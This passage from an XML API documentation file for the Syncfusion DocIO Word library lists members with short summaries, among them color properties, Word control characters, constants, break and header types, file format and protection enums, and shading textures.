            Gets DarkGreen color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.DarkMagenta">
            <summary>
            Gets DarkMagenta color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.DarkRed">
            <summary>
             Gets DarkRed color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.DarkYellow">
            <summary>
             Gets DarkYellow color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.DarkGray">
            <summary>
             Gets DarkGray color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.LightGray">
            <summary>
             Gets LightGray color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.Color">
            <summary>
             Gets the system Color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.ColorId">
            <summary>
            Gets the byte value for a Color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.RGB">
            <summary>
            Gets RGB Color.  Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.NamespaceDoc">
            <summary>
            Contains classes and enumerations for generating the Word document.
            <exclude/>
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ControlChar">
            <summary>
            ControlChar class represents control characters which are used in binary MS Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.CellChar">
            <summary>
            End of non-nested table cell or row character: (char)7 or "\a". 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.ColumnBreakChar">
            <summary>
            End of column character: (char)14. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.FieldEndChar">
            <summary>
            End of MS Word field character: (char)21. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.FieldSeparatorChar">
            <summary>
            Field separator character separates field code from field value. Optional in some fields. 
            Value: (char)20. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.FieldStartChar">
            <summary>
            Start of MS Word field character: (char)19. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.PageBreakChar">
            <summary>
            Page break character: (char)12 or "\f". 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.ParagraphBreakChar">
            <summary>
            End of paragraph character: (char)13. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.SectionBreakChar">
            <summary>
            End of section character: (char)12 or "\f". 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.CarriegeReturn">
            <summary>
            Carriage return character: "\x000d" or "\r". Same as ParagraphBreak. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.CrLf">
            <summary>
            Carriage return followed by line feed character: "\x000d\x000a" or "\r\n". 
            Not used as such in Microsoft Word documents, but commonly used in text files for 
            paragraph breaks. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.DefaultTextInput">
            <summary>
            This is the "o" string used as a default value in text input form fields. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.DefaultTextInputChar">
            <summary>
            This is the 'o' character used as a default value in text input form fields. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.LineBreak">
            <summary>
            Line break string: "\x000b" or "\v". 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.LineBreakChar">
            <summary>
            Line break character: (char)11. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.LineFeed">
            <summary>
            Line feed string: "\x000a" or "\n". Same as Line feed. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.LineFeedChar">
            <summary>
            Line feed character: (char)10. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.NonBreakingSpace">
            <summary>
            Non-breaking space string: "\x00a0". 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.NonBreakingSpaceChar">
            <summary>
            Non-breaking space character: (char)160. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.Tab">
            <summary>
            Tab string: "\x0009" or "\t". 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.TabChar">
            <summary>
            Tab character: (char)9 or "\t". 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.Hyphen">
            <summary>
            Optional hyphen string.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.HyphenChar">
            <summary>
            Optional hyphen character.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.Space">
            <summary>
            Space string.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.SpaceChar">
            <summary>
            Space character
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.DoubleQuote">
            <summary>
            Double Quote
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.LeftDoubleQuote">
            <summary>
            Left Double Quote
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.RightDoubleQuote">
            <summary>
            Right Double Quote
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.DoubleLowQuote">
            <summary>
            Double low Quote
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.NonBreakingHyphen">
            <summary>
            Non-breaking hyphen string.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.NonBreakingHyphenChar">
            <summary>
            Non-breaking hyphen character.
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.Cell">
            <summary>
            End of non-nested table cell or row character: "\x0007" or "\a"
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.ColumnBreak">
            <summary>
            End of column character: "\x000e". 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.PageBreak">
            <summary>
            Page break character: "\x000c" or "\f". Note it has the same value as SectionBreak. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.ParagraphBreak">
            <summary>
            End of paragraph character: "\x000d" or "\r". Same as Carriage return.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ControlChar.SectionBreak">
            <summary>
            End of section character: "\x000c" or "\f". Note it has the same value as PageBreak. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLSConstants">
            <summary>
            Summary description for _constants.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.ImageScalingFactor">
            <summary>
            Specifies SaclingFactor of an Image.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.BitmapScaleFactor">
            <summary>
            Specifies BitmapScaleFactor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.MetafileScaleFactor">
            <summary>
            Specifies MetafileScaleFactor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.BorderLineFactor">
            <summary>
            width of a single line in 1/8 pt, max of 32 pt.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.TwipsInOnePoint">
            <summary>
            Number Twips in 1 Point
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.PercentageFactor">
            <summary>
            Specifies PercentageFactor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.EmusPerPoint">
            <summary>
            EMUs in one point
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.EmusPerPointMetafile">
            <summary>
            EMUs in one point
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.HundredthsUnit">
            <summary>
            Hundredths unit
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.ThousandthsUnit">
            <summary>
            Thousandths of a percentage.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.SixtyThousandthsUnit">
            <summary>
            Positive Fixed Angle 60000ths of a degree.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.FixedPointsUnit">
            <summary>
            Maximum opaque limit (100%) and 0% transparent.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.IntSize">
            <summary>
            Size of the Int32 value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.ShortSize">
            <summary>
            Size of the Int16 value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.LongSize">
            <summary>
            Size of the Int64 value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.BitsInShort">
            <summary>
            Number of bits inside single short value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.BitsInByte">
            <summary>
            Number of bits inside single byte value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.DoubleSize">
            <summary>
            Size of the Double value in bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.WindowsCodePage">
            <summary>
            Microsoft Windows code page
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLSConstants.DateTimeFormatStructure">
            <summary>
            Represents date time format structure.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.SpecialCharacters">
            <summary>
             Contains Ascii-codes of some special characters
             <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.ParagraphEnd">
            <summary>
            End of paragraph character: 0x000d.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.PageBreak">
            <summary>
            End of the page character: 0x000c.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.ColumnBreak">
            <summary>
            End of the column character:0x000e.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.TableAscii">
            <summary>
            Specifies charcter for Table: 0x0007;    
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.ImageAscii">
            <summary>
            Specifies charcter for Image: 0x0001;  
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.ShapeAscii">
            <summary>
            Specifies character for Shape: 0x0008.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.FootnoteAscii">
            <summary>
            Specifies character value for FootNote:0x0002.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.FieldBeginMark">
            <summary>
            Begining of Field Mark character: 0x0013.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.FieldEndMark">
            <summary>
            End of Field Mark character: 0x0015.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.FieldSeparator">
            <summary>
            Specifies character value for FieldSeparator: 0x0014.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.TabAscii">
            <summary>
            Specifies character value for Tab: 0x0009.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.LineBreakAscii">
            <summary>
            Specifies character value for line break: 0x000b.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.SymbolAscii">
            <summary>
            Specifies character value for symbol: 0x0028.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.AnnotationAscii">
            <summary>
            Specifies value for Annotation: 0x0005.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.CurrPageNumber">
            <summary>
            Specifies character value for page number: 0x0000.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.NonBreakingHyphen">
            <summary>
            Specifies the non breaking hyphen character
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.SoftHyphen">
            <summary>
            Specifies the soft hyphen character
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.NonBreakingSpace">
            <summary>
            Specifies the non breaking space character
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.Separator">
            <summary>
            Specifies the Footnotes/Endnotes separator character.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.ContinuationSeparator">
            <summary>
            Specifies the Footnotes/Endnotes continuation separator character.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.FootnoteAsciiStr">
            <summary>
            Specifies <see cref="F:Syncfusion.DocIO.SpecialCharacters.FootnoteAscii"/> value as string.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.PageBreakStr">
            <summary>
            Specifies <see cref="F:Syncfusion.DocIO.SpecialCharacters.PageBreak"/> value as string.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.SpecialCharacters.SpecialSymbolArr">
            <summary>
            Array of special symbols.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordBreakCode">
            <summary>
            Specifies type of break.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordBreakCode.NoBreak">
            <summary>
            No break with the new section beginning on the next paragraph of the same page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordBreakCode.NewColumn">
            <summary>
            Column break with the new section beginning on the next column on the page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordBreakCode.NewPage">
            <summary>
            Section break with the new section beginning on the next page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordBreakCode.EvenPage">
            <summary>
            Section break with the new section beginning on the next even-numbered page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordBreakCode.Oddpage">
            <summary>
            Section break with the new section beginning on the next odd-numbered page.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.HeaderType">
            <summary>
            Specifies the type of header or footer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.HeaderType.InvalidValue">
            <summary>
            Specifies InvalidValue.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.HeaderType.EvenHeader">
            <summary>
            Header for even numbered pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.HeaderType.OddHeader">
            <summary>
            Header for odd numbered pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.HeaderType.EvenFooter">
            <summary>
            Footer for even numbered pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.HeaderType.OddFooter">
            <summary>
            Footer for odd numbered pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.HeaderType.FirstPageHeader">
            <summary>
            Header for the first page of the section.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.HeaderType.FirstPageFooter">
            <summary>
            Footer for the first page of the section.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordChunkType">
            <summary>
            Specifies the type of elementary during reading or writing. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.Text">
            <summary>
            Specifies text element.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.ParagraphEnd">
            <summary>
            Specifies end of the paragraph.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.SectionEnd">
            <summary>
            Specifies section`s end.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.PageBreak">
            <summary>
            Specifies page break.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.ColumnBreak">
            <summary>
            Specifies column break.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.DocumentEnd">
            <summary>
            Specifies document end.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.Image">
            <summary>
            Specifies an Image.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.Shape">
            <summary>
            Specifies a Shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.Table">
            <summary>
            Specifies Table.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.TableRow">
            <summary>
            Specifies row of the table.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.TableCell">
            <summary>
            specifies table`s cell.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.Footnote">
            <summary>
            Specifies FootNote.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.FieldBeginMark">
            <summary>
            Specifies field begin mark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.FieldSeparator">
            <summary>
            Specifies separator for a field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.FieldEndMark">
            <summary>
            Specifies field begin end.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.Tab">
            <summary>
            Specifies tab.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.Annotation">
            <summary>
            Specifies an annotation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.LineBreak">
            <summary>
            Specifies a line break.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.Symbol">
            <summary>
            Specifies a symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.CurrentPageNumber">
            <summary>
            Specifies a current page number.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordChunkType.EndOfSubdocText">
            <summary>
            Specifies end of the document text.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordSubdocument">
            <summary>
            Specifies the type of sub document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocument.Main">
            <summary>
            Main.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocument.Footnote">
            <summary>
            FootNote.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocument.HeaderFooter">
            <summary>
            HeaderFooter.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocument.Endnote">
            <summary>
            EndNote.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocument.Annotation">
            <summary>
            Annotation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocument.TextBox">
            <summary>
            TextBox.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordSubdocument.HeaderTextBox">
            <summary>
            HeaderTextBox.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.SprmCompareType">
            <summary>
            Type of subdocument as Header/Footer, Annotation, etc.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.FormatType">
            <summary>
            Specifies the file format type to use.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Doc">
            <summary>
            Microsoft Word 97-2003 document format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Dot">
            <summary>
            Microsoft Word 97-2003 template format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Docx">
            <summary>
            Microsoft Word document format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2007">
            <summary>
            Microsoft Word 2007 document format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2010">
            <summary>
            Microsoft Word 2010 document format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2013">
            <summary>
            Microsoft Word 2013 document format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2007Dotx">
            <summary>
            Microsoft Word 2007 template format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2010Dotx">
            <summary>
            Microsoft Word 2010 template format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2013Dotx">
            <summary>
            Microsoft Word 2013 template format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2007Docm">
            <summary>
            Microsoft Word 2007 macro enabled file format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2010Docm">
            <summary>
            Microsoft Word 2010 macro enabled file format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2013Docm">
            <summary>
            Microsoft Word 2013 macro enabled file format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2007Dotm">
            <summary>
            Microsoft Word 2007 macro enabled template format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2010Dotm">
            <summary>
            Microsoft Word 2010 macro enabled template format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Word2013Dotm">
            <summary>
            Microsoft Word 2013 macro enabled template format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.WordML">
             <summary>
             Specifies the WordProcessingML (.XML) documents
             </summary>
            <remarks> Provides Read/Write support for Microsoft Office Word��XML format (FlatOPC) documents
            Provides read only support for Microsoft Office Word 2003 XML format documents
            </remarks> 
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Rtf">
            <summary>
            Rich text format (RTF).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Txt">
            <summary>
            Microsoft Windows text format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.EPub">
            <summary>
            E-book format.
            </summary>
            <remarks>This enum is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamrain platforms.</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Xml">
            <summary>
            DLS based Xml file format.
            </summary>
            <remarks>This enum is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamrain platforms.</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Automatic">
            <summary>
            Support all Format Types.
            </summary>
            <remarks>This enum is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamrain platforms.</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Html">
            <summary>
            Html format
            </summary>
            <remarks>This enum is not supported in Silverlight, Windows Phone, Universal and Universal Windows Platform applications.</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.FormatType.Odt">
            <summary>
            Saves the�Word document as an Open Document Text�format. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.HttpContentDisposition">
            <summary>
            Specifies options to stream content to browser.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HttpContentDisposition.InBrowser">
            <summary>
            Open document directly in browser.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.HttpContentDisposition.Attachment">
            <summary>
            Save document as attachment to the disk.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ProtectionType">
            <summary>
            Specifies the type of protection applied to the Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ProtectionType.AllowOnlyComments">
            <summary>
            Allow only comments to be added to the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ProtectionType.AllowOnlyFormFields">
            <summary>
            Allow content to be added to the document only through form fields.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ProtectionType.AllowOnlyReading">
            <summary>
            Allow read-only access to the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ProtectionType.AllowOnlyRevisions">
            <summary>
            Allow only revisions to be made to existing content.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ProtectionType.NoProtection">
            <summary>
            Do not apply protection to the document.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.TextureStyle">
            <summary>
            Specified the shading texture to use.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture10Percent">
            <summary>
            10 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture12Pt5Percent">
            <summary>
            12.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture15Percent">
            <summary>
            15 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture17Pt5Percent">
            <summary>
            17.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture20Percent">
            <summary>
            20 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture22Pt5Percent">
            <summary>
            22.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture25Percent">
            <summary>
            25 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture27Pt5Percent">
            <summary>
            27.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture2Pt5Percent">
            <summary>
            2.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture30Percent">
            <summary>
            30 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture32Pt5Percent">
            <summary>
            32.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture35Percent">
            <summary>
            35 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture37Pt5Percent">
            <summary>
            37.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture40Percent">
            <summary>
            40 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture42Pt5Percent">
            <summary>
            42.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture45Percent">
            <summary>
            45 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture47Pt5Percent">
            <summary>
            47.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture50Percent">
            <summary>
            50 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture52Pt5Percent">
            <summary>
            52.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture55Percent">
            <summary>
            55 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture57Pt5Percent">
            <summary>
            57.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture5Percent">
            <summary>
            5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture60Percent">
            <summary>
            60 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture62Pt5Percent">
            <summary>
            62.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture65Percent">
            <summary>
            65 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture67Pt5Percent">
            <summary>
            67.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture70Percent">
            <summary>
            70 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture72Pt5Percent">
            <summary>
            72.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture75Percent">
            <summary>
            75 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture77Pt5Percent">
            <summary>
            77.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture7Pt5Percent">
            <summary>
            7.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture80Percent">
            <summary>
            80 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture82Pt5Percent">
            <summary>
            82.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture85Percent">
            <summary>
            85 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture87Pt5Percent">
            <summary>
            87.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture90Percent">
            <summary>
            90 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture92Pt5Percent">
            <summary>
            92.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture95Percent">
            <summary>
            95 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.Texture97Pt5Percent">
            <summary>
            97.5 percent shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureCross">
            <summary>
            Horizontal cross shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureDarkCross">
            <summary>
            Dark horizontal cross shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureDarkDiagonalCross">
            <summary>
            Dark diagonal cross shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureDarkDiagonalDown">
            <summary>
            Dark diagonal down shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureDarkDiagonalUp">
            <summary>
            Dark diagonal up shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureDarkHorizontal">
            <summary>
            Dark horizontal shading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.TextureStyle.TextureDarkVertical">
